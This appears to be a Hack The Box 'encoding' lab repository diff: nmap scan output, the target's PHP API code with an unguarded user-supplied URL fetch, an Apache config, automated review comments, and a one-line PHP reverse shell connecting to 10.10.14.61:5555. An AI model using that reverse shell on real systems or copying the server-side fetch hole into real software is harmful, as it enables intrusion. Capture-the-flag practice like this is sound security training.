<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)&#xa;SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)&#xa;OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T6(R=N)&#xa;T7(R=N)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="3975677" lastboot="Tue Dec 13 19:46:08 2022"/>
<distance value="2"/>
<tcpsequence index="255" difficulty="Good luck!" values="E9BE12CA,A3101395,E95E70DA,7146064C,326727AD,EB2A0B78"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="ECF7C0E0,ECF7C154,ECF7C1AC,ECF7C212,ECF7C279,ECF7C2DC"/>
<trace port="21" proto="tcp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.03"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.51" host="encoding.htb"/>
</trace>
<times srtt="27771" rttvar="2857" to="100000"/>
</host>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<runstats><finished time="1674932845" timestr="Sat Jan 28 20:07:25 2023" summary="Nmap done at Sat Jan 28 20:07:25 2023; 1 IP address (1 host up) scanned in 29.16 seconds" elapsed="29.16" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,74 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2" start="1674932816" startstr="Sat Jan 28 20:06:56 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="NSE" time="1674932816"/>
<taskend task="NSE" time="1674932816"/>
<taskbegin task="UDP Scan" time="1674932816"/>
<taskend task="UDP Scan" time="1674932904" extrainfo="100 total ports"/>
<taskbegin task="Service scan" time="1674932905"/>
<taskprogress task="Service scan" time="1674932970" percent="6.25" remaining="976" etc="1674933945"/>
<taskend task="Service scan" time="1674933002" extrainfo="16 services on 1 host"/>
<taskbegin task="Traceroute" time="1674933005"/>
<taskend task="Traceroute" time="1674933005"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1674933005"/>
<taskend task="Parallel DNS resolution of 1 host." time="1674933016"/>
<taskbegin task="NSE" time="1674933016"/>
<taskprogress task="NSE" time="1674933047" percent="99.36" remaining="1" etc="1674933047"/>
<taskend task="NSE" time="1674933059"/>
<taskbegin task="NSE" time="1674933059"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<host starttime="1674932816" endtime="1674933060"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="84">
<extrareasons reason="port-unreach" count="84" proto="udp" ports="7,9,17,19,49,53,67,69,88,123,136-139,158,161-162,427,443,445,497,500,514-515,518,623,626,631,996-997,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,4444,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185,49188,49191,49194,49200-49201,65024"/>
</extraports>
<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
<port protocol="udp" portid="80"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http" method="table" conf="3"/></port>
<port protocol="udp" portid="111"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="udp" portid="120"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="cfdptkt" method="table" conf="3"/></port>
<port protocol="udp" portid="135"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="177"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="xdmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="520"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="route" method="table" conf="3"/></port>
<port protocol="udp" portid="593"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="http-rpc-epmap" method="table" conf="3"/></port>
<port protocol="udp" portid="998"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="puparp" method="table" conf="3"/></port>
<port protocol="udp" portid="999"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="applix" method="table" conf="3"/></port>
<port protocol="udp" portid="3703"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="adobeserver-3" method="table" conf="3"/></port>
<port protocol="udp" portid="4500"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="nat-t-ike" method="table" conf="3"/></port>
<port protocol="udp" portid="49186"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49190"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49192"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49193"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
</ports>
<os><portused state="closed" proto="udp" portid="7"/>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;SEQ(CI=Z)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<distance value="2"/>
<trace port="49152" proto="udp">
<hop ttl="1" ipaddr="10.10.14.1" rtt="25.83"/>
<hop ttl="2" ipaddr="10.129.123.2" rtt="26.04" host="encoding.htb"/>
</trace>
<times srtt="25941" rttvar="1098" to="100000"/>
</host>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<taskbegin task="NSE" time="1674933060"/>
<taskend task="NSE" time="1674933060"/>
<runstats><finished time="1674933060" timestr="Sat Jan 28 20:11:00 2023" summary="Nmap done at Sat Jan 28 20:11:00 2023; 1 IP address (1 host up) scanned in 243.96 seconds" elapsed="243.96" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

1
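--- a/HTB/encoding/shell.php
+++ b/HTB/encoding/shell.php
@@ -0,0 +1 @@
+$sock=fsockopen("10.10.14.61",5555);exec("sh <&3 >&3 2>&3");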


@@ -0,0 +1,71 @@
<?php
// Global functions
function jsonify($body, $code = null)
{
if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}
function get_included_contents($filename) {
ob_start();
include $filename;
return ob_get_clean();
}
function get_url_content($url){
$domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}
function make_api_call($action, $data, $uri_path, $is_file = false){
if ($is_file) {
$post = [
'data' => file_get_contents($data),
'action' => $action,
'uri_path' => $uri_path
];
} else {
$post = [
'data' => $data,
'action' => $action,
'uri_path' => $uri_path
];
}
$ch = curl_init();
$url = 'http://api.haxtables.htb' . $uri_path . '/index.php';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post));
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
?>


@@ -0,0 +1,54 @@
<?php
include_once '../../header.php';
include_once '../../../utils.php';
include_once 'utils.php';
start();
if (isset($_FILES['data_file'])) {
$action = $_POST['action'];
$data = file_get_contents($_FILES['data_file']['tmp_name']);
} else {
$jsondata = json_decode(file_get_contents('php://input'), true);
$action = $jsondata['action'];
$data = $jsondata['data'];
if ( empty($jsondata) || !array_key_exists('action', $jsondata))
{
echo jsonify(['message' => 'Insufficient parameters!']);
}
}
if ($action === 'str2hex') {
echo jsonify(['data'=> str2hex($data)]);
} else if ($action === 'hex2str') {
echo jsonify(['data' => hex2str($data) ]);
} else if ($action === 'md5') {
echo jsonify(['data'=> md5($data)]);
} else if ($action === 'sha1') {
echo jsonify(['data'=> sha1($data)]);
} else if ($action === 'urlencode') {
echo jsonify(['data'=> urlencode($data)]);
} else if ($action === 'urldecode') {
echo jsonify(['data'=> urldecode($data)]);
} else if ($action === 'b64encode') {
echo jsonify(['data'=> base64_encode($data)]);
} else if ($action === 'b64decode') {
echo jsonify(['data'=> base64_decode($data)]);
} else {
echo jsonify(['message'=> 'Invalid action'], 404);
}
?>
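Review bot: `$jsondata['action']` and `$jsondata['data']` are read before the `empty($jsondata) || !array_key_exists('action', $jsondata)` check, so a body that is not valid JSON or lacks a key triggers PHP warnings before it is rejected, and the rejection is sent with the default 200 status. Move the check above the two reads and answer with `jsonify(['message' => 'Insufficient parameters!'], 400);`. The upload branch reads `$_POST['action']` with no check at all and could use `$_POST['action'] ?? null`. If `jsonify()` is the helper added elsewhere in this commit, it ends with `exit`, so the `echo` in front of each call never prints anything and can be dropped. The second handler further down this page has the same ordering.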


@@ -0,0 +1,17 @@
<?php
// Version 3
// String functions
function str2hex($string) {
return bin2hex($string);
}
function hex2str($integer) {
if (!preg_match("/^[0-9A-Fa-f]+$/", $integer)) {
return 'Invalid characters specified';
} else {
return hex2bin($integer);
}
}
?>
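Review bot: The pattern in `hex2str()` accepts input that `hex2bin()` then refuses: an odd number of hex digits passes the check, and `$` also matches before a trailing newline, so the function can return `false` with a PHP warning instead of the 'Invalid characters specified' message. Anchoring with `\A`/`\z` and requiring digit pairs closes both gaps: `if (!preg_match('/\A(?:[0-9A-Fa-f]{2})+\z/', $integer)) {`. The parameter holds a hex string, so `$hex` would be a clearer name than `$integer`. A one-line doc comment stating that the error case returns a message string rather than `false` would also help callers.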


@@ -0,0 +1,58 @@
<?php
include_once '../../../utils.php';
include_once 'utils.php';
if (isset($_FILES['data_file'])) {
$action = $_POST['action'];
$data = file_get_contents($_FILES['data_file']['tmp_name']);
} else {
$jsondata = json_decode(file_get_contents('php://input'), true);
$action = $jsondata['action'];
if ( empty($jsondata) || !array_key_exists('action', $jsondata))
{
echo jsonify(['message' => 'Insufficient parameters!']);
}
if (array_key_exists('file_url', $jsondata)) {
$data = get_url_content($jsondata['file_url']);
} else {
$data = $jsondata['data'];
}
}
if ($action === 'str2hex') {
echo jsonify(['data'=> str2hex($data)]);
} else if ($action === 'hex2str') {
echo jsonify(['data' => hex2str($data) ]);
} else if ($action === 'md5') {
echo jsonify(['data'=> md5($data)]);
} else if ($action === 'sha1') {
echo jsonify(['data'=> sha1($data)]);
} else if ($action === 'urlencode') {
echo jsonify(['data'=> urlencode($data)]);
} else if ($action === 'urldecode') {
echo jsonify(['data'=> urldecode($data)]);
} else if ($action === 'b64encode') {
echo jsonify(['data'=> base64_encode($data)]);
} else if ($action === 'b64decode') {
echo jsonify(['data'=> base64_decode($data)]);
} else {
echo jsonify(['message'=> 'Invalid action'], 404);
}
?>
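Review bot: The `file_url` branch passes a client-supplied URL straight to `get_url_content()` and returns the transformed response body to the caller, so this endpoint acts as a server-side fetch proxy whose only protection is whatever that helper checks; the helper is defined outside this hunk. It is worth limiting here what may be fetched (scheme, a host allow-list, response size) rather than relying on the helper alone. `curl_exec()` returns `false` on failure, and that value is currently hashed or encoded as if it were data; add `if ($data === false) { jsonify(['message' => 'Fetch failed'], 502); }` after the call.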


@@ -0,0 +1,54 @@
<VirtualHost *:80>
ServerName haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerName api.haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/api
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerName image.haxtables.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/image
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
#SecRuleEngine On
<LocationMatch />
SecAction initcol:ip=%{REMOTE_ADDR},pass,nolog,id:'200001'
SecAction "phase:5,deprecatevar:ip.somepathcounter=1/1,pass,nolog,id:'200002'"
SecRule IP:SOMEPATHCOUNTER "@gt 5" "phase:2,pause:300,deny,status:509,setenv:RATELIMITED,skip:1,nolog,id:'200003'"
SecAction "phase:2,pass,setvar:ip.somepathcounter=+1,nolog,id:'200004'"
Header always set Retry-After "10" env=RATELIMITED
</LocationMatch>
ErrorDocument 429 "Rate Limit Exceeded"
<Directory /var/www/image>
Deny from all
Allow from 127.0.0.1
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</DIrectory>
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Process finished with exit code 0
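Review bot: The `<Directory /var/www/image>` block mixes the 2.2-style `Deny from all` / `Allow from 127.0.0.1` with the 2.4-style `Require all granted`, so which rule decides access depends on whether mod_access_compat is loaded and how the two are combined; state the intent once, e.g. `Require local`, in place of those three lines. `#SecRuleEngine On` is commented out, so unless the engine is enabled elsewhere the rate-limit rules in `<LocationMatch />` do nothing, and the rule denies with `status:509` while the `ErrorDocument` is registered for 429. `Options Indexes` also enables directory listings for this vhost; remove it if listings are not intended. The last line, `Process finished with exit code 0`, looks like pasted IDE output rather than configuration.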


@@ -0,0 +1,71 @@
<?php
// Global functions
function jsonify($body, $code = null)
{
if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}
function get_included_contents($filename) {
ob_start();
include $filename;
return ob_get_clean();
}
function get_url_content($url){
$domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}
function make_api_call($action, $data, $uri_path, $is_file = false){
if ($is_file) {
$post = [
'data' => file_get_contents($data),
'action' => $action,
'uri_path' => $uri_path
];
} else {
$post = [
'data' => $data,
'action' => $action,
'uri_path' => $uri_path
];
}
$ch = curl_init();
$url = 'http://api.haxtables.htb' . $uri_path . '/index.php';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post));
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
?>